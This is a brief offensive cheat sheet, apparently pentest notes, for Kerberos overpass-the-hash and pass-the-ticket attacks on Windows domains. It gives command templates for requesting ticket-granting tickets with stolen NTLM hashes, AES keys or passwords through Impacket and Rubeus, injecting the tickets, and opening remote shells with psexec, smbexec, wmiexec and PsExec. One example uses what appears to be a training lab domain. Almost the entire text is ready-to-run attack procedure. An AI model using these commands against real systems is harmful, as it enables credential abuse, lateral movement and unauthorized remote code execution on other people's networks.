# Request the TGT with hash
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
# Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
# Request the TGT with password
python getTGT.py <domain_name>/<user_name>:[password]
# Set the TGT for impacket use
export KRB5CCNAME=<TGT_ccache_file>
# Execute remote commands with any of the following by using the TGT
python psexec.py rastalabs.local/jack@ -k -no-pass
python smbexec.py rastalabs.local/jack@ -k -no-pass
python wmiexec.py rastalabs.local/jack@ -k -no-pass
# Ask and inject the ticket
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
# Execute a cmd in the remote machine
.\PsExec.exe -accepteula \\<remote_hostname> cmd
Impacket’s psexec.py offers psexec like functionality. This will give you an interactive shell on the Windows host. psexec.py also allows using Service Tickets, saved as a ccache file for Authentication. It can be obtained via Impacket’s GetST.py